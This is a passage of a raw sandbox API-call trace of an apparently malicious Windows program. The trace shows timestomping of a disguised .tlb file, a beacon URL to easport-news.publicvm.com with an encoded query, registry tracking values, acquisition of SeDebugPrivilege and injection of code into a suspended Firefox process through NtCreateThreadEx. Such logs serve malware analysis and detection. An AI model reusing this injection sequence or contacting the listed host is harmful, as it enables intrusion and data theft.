SetLastError (dwErrCode=0x0) [0082.140] GetLastError () returned 0x0 [0082.140] SetLastError (dwErrCode=0x0) [0082.140] GetLastError () returned 0x0 [0082.140] SetLastError (dwErrCode=0x0) [0082.141] GetLastError () returned 0x0 [0082.141] SetLastError (dwErrCode=0x0) [0082.141] GetLastError () returned 0x0 [0082.141] SetLastError (dwErrCode=0x0) [0082.141] GetLastError () returned 0x0 [0082.141] SetLastError (dwErrCode=0x0) [0082.141] GetLastError () returned 0x0 [0082.141] SetLastError (dwErrCode=0x0) [0082.141] GetLastError () returned 0x0 [0082.141] SetLastError (dwErrCode=0x0) [0082.141] GetLastError () returned 0x0 [0082.141] SetLastError (dwErrCode=0x0) [0082.141] GetLastError () returned 0x0 [0082.141] SetLastError (dwErrCode=0x0) [0082.141] GetLastError () returned 0x0 [0082.141] SetLastError (dwErrCode=0x0) [0082.141] GetLastError () returned 0x0 [0082.141] SetLastError (dwErrCode=0x0) [0082.141] GetLastError () returned 0x0 [0082.141] SetLastError (dwErrCode=0x0) [0082.141] GetLastError () returned 0x0 [0082.141] SetLastError (dwErrCode=0x0) [0082.141] GetLastError () returned 0x0 [0082.141] SetLastError (dwErrCode=0x0) [0082.141] GetLastError () returned 0x0 [0082.141] SetLastError (dwErrCode=0x0) [0082.141] GetLastError () returned 0x0 [0082.141] SetLastError (dwErrCode=0x0) [0082.141] GetLastError () returned 0x0 [0082.141] SetLastError (dwErrCode=0x0) [0082.141] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2c0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0082.142] GetFileType (hFile=0x178) returned 0x1 [0082.142] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3ec | out: lpSystemTimeAsFileTime=0x172c3ec*(dwLowDateTime=0xfe5b6530, dwHighDateTime=0x1d3dfba)) [0082.142] GetLastError () returned 0xb7 [0082.142] SetLastError (dwErrCode=0xb7) [0082.142] GetLastError () returned 0xb7 [0082.142] SetLastError (dwErrCode=0xb7) [0082.142] GetLastError () returned 0xb7 [0082.142] SetLastError (dwErrCode=0xb7) [0082.142] CloseHandle (hObject=0x178) returned 1 [0082.142] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0082.142] SetFileTime (hFile=0x178, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0082.142] CloseHandle (hObject=0x178) returned 1 [0082.142] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\6f6c657374646d702e6f6378ff.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0082.142] GetFileSize (in: hFile=0x178, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfa4 [0082.142] CreateFileMappingA (hFile=0x178, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x17c [0082.142] MapViewOfFile (hFileMappingObject=0x17c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2c0000 [0082.143] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0xea60) returned 0x0 [0082.143] CreateFileW (lpFileName="\\\\.\\pipe\\c41b2304" (normalized: "\\device\\namedpipe\\c41b2304"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0082.143] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x184 [0082.143] SetNamedPipeHandleState (hNamedPipe=0x180, lpMode=0x172e544, lpMaxCollectionCount=0x0, lpCollectDataTimeout=0x0) returned 1 [0082.143] GetTickCount () returned 0x23448 [0082.143] GetLastError () returned 0x0 [0082.143] SetLastError (dwErrCode=0x0) [0082.143] GetLastError () returned 0x0 [0082.143] SetLastError (dwErrCode=0x0) [0082.143] GetLastError () returned 0x0 [0082.143] SetLastError (dwErrCode=0x0) [0082.143] GetLastError () returned 0x0 [0082.143] SetLastError (dwErrCode=0x0) [0082.143] GetLastError () returned 0x0 [0082.143] SetLastError (dwErrCode=0x0) [0082.143] GetLastError () returned 0x0 [0082.143] SetLastError (dwErrCode=0x0) [0082.144] GetLastError () returned 0x0 [0082.144] SetLastError (dwErrCode=0x0) [0082.144] GetLastError () returned 0x0 [0082.144] SetLastError (dwErrCode=0x0) [0082.144] GetLastError () returned 0x0 [0082.144] SetLastError (dwErrCode=0x0) [0082.144] GetLastError () returned 0x0 [0082.144] SetLastError (dwErrCode=0x0) [0082.144] UnmapViewOfFile (lpBaseAddress=0x2c0000) returned 1 [0082.144] CloseHandle (hObject=0x17c) returned 1 [0082.144] CloseHandle (hObject=0x178) returned 1 [0082.144] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0082.144] GetFileType (hFile=0x178) returned 0x1 [0082.144] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3fc | out: lpSystemTimeAsFileTime=0x172c3fc*(dwLowDateTime=0xfe5b6530, dwHighDateTime=0x1d3dfba)) [0082.144] GetLastError () returned 0xb7 [0082.144] SetLastError (dwErrCode=0xb7) [0082.144] GetLastError () returned 0xb7 [0082.144] SetLastError (dwErrCode=0xb7) [0082.145] GetLastError () returned 0xb7 [0082.145] SetLastError (dwErrCode=0xb7) [0082.145] CloseHandle (hObject=0x178) returned 1 [0082.145] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0082.145] SetFileTime (hFile=0x178, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0082.145] CloseHandle (hObject=0x178) returned 1 [0082.145] strlen (_Str="easport-news.publicvm.com") returned 0x19 [0082.145] strlen (_Str="index/index.php?h=O2i1voZ4%2bOQ%3d&d=OWiwXT1mb%2bQ7abqPsE7J0QNagIm2S8jQC1i1voZ4%2bOQ7aLW%2bhnjJ0g1ZgIa0Tc%2fUCFiBjrY8ydYJXYGHtEHI0BUCxdmmWNjEG0iVnqZY2MQbSJWepljYxM%3d%3d") returned 0xa9 [0082.145] strlen (_Str="166158257030400D1225492904.jpg") returned 0x1e [0082.145] WriteFile (in: hFile=0x180, lpBuffer=0x1fd0268*, nNumberOfBytesToWrite=0x10af, lpNumberOfBytesWritten=0x172e4f4, lpOverlapped=0x311230 | out: lpBuffer=0x1fd0268*, lpNumberOfBytesWritten=0x172e4f4*=0x10af, lpOverlapped=0x311230) returned 1 [0082.151] ReadFile (in: hFile=0x180, lpBuffer=0x171e538, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x171e534, lpOverlapped=0x311230 | out: lpBuffer=0x171e538*, lpNumberOfBytesRead=0x171e534*=0x134, lpOverlapped=0x311230) returned 1 [0083.544] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x7a120) returned 0x0 [0083.544] GetOverlappedResult (in: hFile=0x180, lpOverlapped=0x311230, lpNumberOfBytesTransferred=0x171e534, bWait=0 | out: lpNumberOfBytesTransferred=0x171e534) returned 1 [0083.544] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d4, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0083.544] GetFileType (hFile=0x178) returned 0x1 [0083.544] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c400 | out: lpSystemTimeAsFileTime=0x172c400*(dwLowDateTime=0xff31a0f0, dwHighDateTime=0x1d3dfba)) [0083.544] GetLastError () returned 0xb7 [0083.544] SetLastError (dwErrCode=0xb7) [0083.544] GetLastError () returned 0xb7 [0083.544] SetLastError (dwErrCode=0xb7) [0083.544] GetLastError () returned 0xb7 [0083.544] SetLastError (dwErrCode=0xb7) [0083.545] CloseHandle (hObject=0x178) returned 1 [0083.545] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0083.545] SetFileTime (hFile=0x178, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0083.545] CloseHandle (hObject=0x178) returned 1 [0083.546] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d4, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0083.546] GetFileType (hFile=0x178) returned 0x1 [0083.546] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c400 | out: lpSystemTimeAsFileTime=0x172c400*(dwLowDateTime=0xff31a0f0, dwHighDateTime=0x1d3dfba)) [0083.546] GetLastError () returned 0xb7 [0083.546] SetLastError (dwErrCode=0xb7) [0083.546] GetLastError () returned 0xb7 [0083.546] SetLastError (dwErrCode=0xb7) [0083.546] GetLastError () returned 0xb7 [0083.546] SetLastError (dwErrCode=0xb7) [0083.546] CloseHandle (hObject=0x178) returned 1 [0083.546] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0083.546] SetFileTime (hFile=0x178, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0083.546] CloseHandle (hObject=0x178) returned 1 [0083.546] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172e3a0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0083.547] GetFileType (hFile=0x178) returned 0x1 [0083.547] CloseHandle (hObject=0x178) returned 1 [0083.547] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0083.547] SetFileTime (hFile=0x178, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0083.547] CloseHandle (hObject=0x178) returned 1 [0083.547] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e510 | out: phkResult=0x72f1ed90*=0x178, lpdwDisposition=0x172e510*=0x2) returned 0x0 [0083.547] RegSetValueExA (in: hKey=0x178, lpValueName="FPcnt", Reserved=0x0, dwType=0x4, lpData=0x172e540*=0x0, cbData=0x4 | out: lpData=0x172e540*=0x0) returned 0x0 [0083.547] RegCloseKey (hKey=0x178) returned 0x0 [0083.547] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e50c | out: phkResult=0x72f1ed90*=0x178, lpdwDisposition=0x172e50c*=0x2) returned 0x0 [0083.547] RegQueryValueExA (in: hKey=0x178, lpValueName="FPcnt", lpReserved=0x0, lpType=0x0, lpData=0x172e53c, lpcbData=0x172e540*=0x4 | out: lpType=0x0, lpData=0x172e53c*=0x0, lpcbData=0x172e540*=0x4) returned 0x0 [0083.547] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d4, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0083.547] GetFileType (hFile=0x17c) returned 0x1 [0083.548] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c400 | out: lpSystemTimeAsFileTime=0x172c400*(dwLowDateTime=0xff31a0f0, dwHighDateTime=0x1d3dfba)) [0083.548] GetLastError () returned 0xb7 [0083.548] SetLastError (dwErrCode=0xb7) [0083.548] GetLastError () returned 0xb7 [0083.548] SetLastError (dwErrCode=0xb7) [0083.548] GetLastError () returned 0xb7 [0083.548] SetLastError (dwErrCode=0xb7) [0083.548] CloseHandle (hObject=0x17c) returned 1 [0083.548] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0083.548] SetFileTime (hFile=0x17c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0083.548] CloseHandle (hObject=0x17c) returned 1 [0083.548] CloseHandle (hObject=0x180) returned 1 [0083.548] CloseHandle (hObject=0x184) returned 1 [0083.548] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0xea60) returned 0x0 [0083.548] CreateFileW (lpFileName="\\\\.\\pipe\\c41b2304" (normalized: "\\device\\namedpipe\\c41b2304"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0083.548] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x180 [0083.548] SetNamedPipeHandleState (hNamedPipe=0x184, lpMode=0x172e544, lpMaxCollectionCount=0x0, lpCollectDataTimeout=0x0) returned 1 [0083.548] WriteFile (in: hFile=0x184, lpBuffer=0x312ec8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x172e540, lpOverlapped=0x311230 | out: lpBuffer=0x312ec8*, lpNumberOfBytesWritten=0x172e540*=0x8, lpOverlapped=0x311230) returned 1 [0083.549] CloseHandle (hObject=0x184) returned 1 [0083.549] CloseHandle (hObject=0x180) returned 1 [0083.549] TerminateProcess (hProcess=0x0, uExitCode=0x0) returned 0 [0083.549] GetLastError () returned 0x6 [0083.549] CloseHandle (hObject=0x0) returned 0 [0083.549] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172fd04 | out: lpSystemTimeAsFileTime=0x172fd04*(dwLowDateTime=0xff31a0f0, dwHighDateTime=0x1d3dfba)) [0083.549] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172fce8 | out: phkResult=0x72f1ed90*=0x180, lpdwDisposition=0x172fce8*=0x2) returned 0x0 [0083.549] RegSetValueExA (in: hKey=0x180, lpValueName="LastValue", Reserved=0x0, dwType=0x4, lpData=0x72f1eda8*=0x5ae5d5ef, cbData=0x4 | out: lpData=0x72f1eda8*=0x5ae5d5ef) returned 0x0 [0083.549] RegCloseKey (hKey=0x180) returned 0x0 [0083.549] CloseHandle (hObject=0x140) returned 1 [0083.549] GetTickCount () returned 0x239c4 [0083.549] GetLastError () returned 0x6 [0083.549] SetLastError (dwErrCode=0x6) [0083.549] GetLastError () returned 0x6 [0083.549] SetLastError (dwErrCode=0x6) [0083.549] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172da9c, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0083.549] GetFileType (hFile=0x140) returned 0x1 [0083.549] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dbc8 | out: lpSystemTimeAsFileTime=0x172dbc8*(dwLowDateTime=0xff31a0f0, dwHighDateTime=0x1d3dfba)) [0083.549] GetLastError () returned 0xb7 [0083.549] SetLastError (dwErrCode=0xb7) [0083.549] GetLastError () returned 0xb7 [0083.549] SetLastError (dwErrCode=0xb7) [0083.549] GetLastError () returned 0xb7 [0083.549] SetLastError (dwErrCode=0xb7) [0083.550] CloseHandle (hObject=0x140) returned 1 [0083.550] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0083.550] SetFileTime (hFile=0x140, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0083.550] CloseHandle (hObject=0x140) returned 1 [0083.550] Sleep (dwMilliseconds=0x4a8620) [0093.552] GetLastError () returned 0x0 [0093.552] GetLastError () returned 0x0 [0093.552] GetLastError () returned 0x0 [0093.552] GetLastError () returned 0x0 [0093.552] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76700000 [0093.553] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0093.553] GetProcAddress (hModule=0x76700000, lpProcName="RegQueryValueExA") returned 0x767148ef [0093.553] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0093.553] wsprintfA (in: param_1=0x172bd9c, param_2="%s\\shell\\open\\command" | out: param_1="http\\shell\\open\\command") returned 23 [0093.553] RegCreateKeyExA (in: hKey=0x80000000, lpSubKey="http\\shell\\open\\command", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x172bc70, lpdwDisposition=0x172bc90 | out: phkResult=0x172bc70*=0x182, lpdwDisposition=0x172bc90*=0x2) returned 0x0 [0093.553] RegQueryValueExA (in: hKey=0x182, lpValueName=0x0, lpReserved=0x0, lpType=0x172bc94, lpData=0x172bc98, lpcbData=0x172bc68*=0x104 | out: lpType=0x172bc94*=0x1, lpData="\"C:\\Program Files\\Mozilla Firefox\\firefox.exe\" -osint -url \"%1\"", lpcbData=0x172bc68*=0x40) returned 0x0 [0093.553] RegCloseKey (hKey=0x182) returned 0x0 [0093.553] lstrlenA (lpString=".exe") returned 4 [0093.553] _snwprintf (in: _Dest=0x172c2f8, _Count=0x104, _Format="%S" | out: _Dest="c:\\program files\\mozilla firefox\\firefox.exe") returned 44 [0093.554] GetComputerNameW (in: lpBuffer=0x172bc88, nSize=0x172bc78 | out: lpBuffer="CRH2YWU7", nSize=0x172bc78) returned 1 [0093.554] _snwprintf (in: _Dest=0x172c0f0, _Count=0x104, _Format="%08x" | out: _Dest="c41b2305") returned 8 [0093.554] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="c41b2305") returned 0x180 [0093.554] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0093.554] LoadLibraryW (lpLibFileName="psapi.dll") returned 0x77c70000 [0093.554] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x76700000 [0093.554] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0093.554] GetProcAddress (hModule=0x761d0000, lpProcName="CreateRemoteThread") returned 0x7625f33b [0093.554] GetProcAddress (hModule=0x761d0000, lpProcName="WriteProcessMemory") returned 0x7620c1de [0093.554] GetProcAddress (hModule=0x761d0000, lpProcName="OpenProcess") returned 0x762159d7 [0093.554] GetProcAddress (hModule=0x761d0000, lpProcName="ReadProcessMemory") returned 0x7620c1ce [0093.555] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessW") returned 0x761d204d [0093.555] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0093.555] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0093.555] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0093.555] GetProcAddress (hModule=0x761d0000, lpProcName="VirtualAllocEx") returned 0x7620c1b6 [0093.555] GetProcAddress (hModule=0x761d0000, lpProcName="VirtualFreeEx") returned 0x7620c1ee [0093.555] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0093.555] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0093.555] GetProcAddress (hModule=0x77c70000, lpProcName="EnumProcessModules") returned 0x77c71408 [0093.555] GetProcAddress (hModule=0x77c70000, lpProcName="EnumProcessModulesEx") returned 0x77c715de [0093.555] GetProcAddress (hModule=0x77c70000, lpProcName="GetModuleBaseNameW") returned 0x77c7152c [0093.555] GetProcAddress (hModule=0x77c70000, lpProcName="EnumProcesses") returned 0x77c71544 [0093.556] GetProcAddress (hModule=0x76700000, lpProcName="LookupPrivilegeValueW") returned 0x767141b3 [0093.556] GetProcAddress (hModule=0x76700000, lpProcName="OpenProcessToken") returned 0x76714304 [0093.556] GetProcAddress (hModule=0x76700000, lpProcName="AdjustTokenPrivileges") returned 0x7671418e [0093.556] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x172be68 | out: lpLuid=0x172be68*(LowPart=0x14, HighPart=0)) returned 1 [0093.556] GetCurrentProcess () returned 0xffffffff [0093.556] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x172be74 | out: TokenHandle=0x172be74*=0x140) returned 1 [0093.556] AdjustTokenPrivileges (in: TokenHandle=0x140, DisableAllPrivileges=0, NewState=0x172be64*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0093.556] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0093.556] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessW") returned 0x761d204d [0093.575] CreateProcessW (in: lpApplicationName="c:\\program files\\mozilla firefox\\firefox.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x172bfa0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x172bf44 | out: lpCommandLine=0x0, lpProcessInformation=0x172bf44*(hProcess=0x17c, hThread=0x184, dwProcessId=0x840, dwThreadId=0x248)) returned 1 [0093.577] GetLastError () returned 0x0 [0093.577] OpenProcess (dwDesiredAccess=0x43a, bInheritHandle=0, dwProcessId=0x840) returned 0x18c [0093.577] VirtualAllocEx (hProcess=0x18c, lpAddress=0x0, dwSize=0x380c, flAllocationType=0x1000, flProtect=0x4) returned 0x50000 [0093.577] VirtualProtectEx (in: hProcess=0x18c, lpAddress=0x50000, dwSize=0x380c, flNewProtect=0x40, lpflOldProtect=0x172be70 | out: lpflOldProtect=0x172be70*=0x4) returned 1 [0093.577] WriteProcessMemory (in: hProcess=0x18c, lpBaseAddress=0x50000, lpBuffer=0x172c500*, nSize=0x380c, lpNumberOfBytesWritten=0x172be6c | out: lpBuffer=0x172c500*, lpNumberOfBytesWritten=0x172be6c*=0x380c) returned 1 [0093.578] GetVersionExW (in: lpVersionInformation=0x172bd18*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x172bd18*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.578] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77ec0000 [0093.578] GetProcAddress (hModule=0x77ec0000, lpProcName="NtCreateThreadEx") returned 0x77f05728 [0093.578] NtCreateThreadEx (in: ThreadHandle=0x172bcdc, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0x18c, lpStartAddress=0x50202, lpParameter=0x53800, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x0, SizeOfStackReserve=0x0, lpBytesBuffer=0x172bca4 | out: ThreadHandle=0x172bcdc*=0x188, lpBytesBuffer=0x172bca4) returned 0x0 [0093.579] CloseHandle (hObject=0x17c) returned 1 [0093.579] CloseHandle (hObject=0x184) returned 1 [0093.579] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x1729c28, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0093.579] GetFileType (hFile=0x184) returned 0x1 [0093.579] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1729d54 | out: lpSystemTimeAsFileTime=0x1729d54*(dwLowDateTime=0x52c3510, dwHighDateTime=0x1d3dfbb)) [0093.579] GetLastError () returned 0xb7 [0093.579] SetLastError (dwErrCode=0xb7) [0093.579] GetLastError () returned 0xb7 [0093.579] SetLastError (dwErrCode=0xb7) [0093.579] GetLastError () returned 0xb7 [0093.579] SetLastError (dwErrCode=0xb7) [0093.580] CloseHandle (hObject=0x184) returned 1 [0093.580] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0093.580] SetFileTime 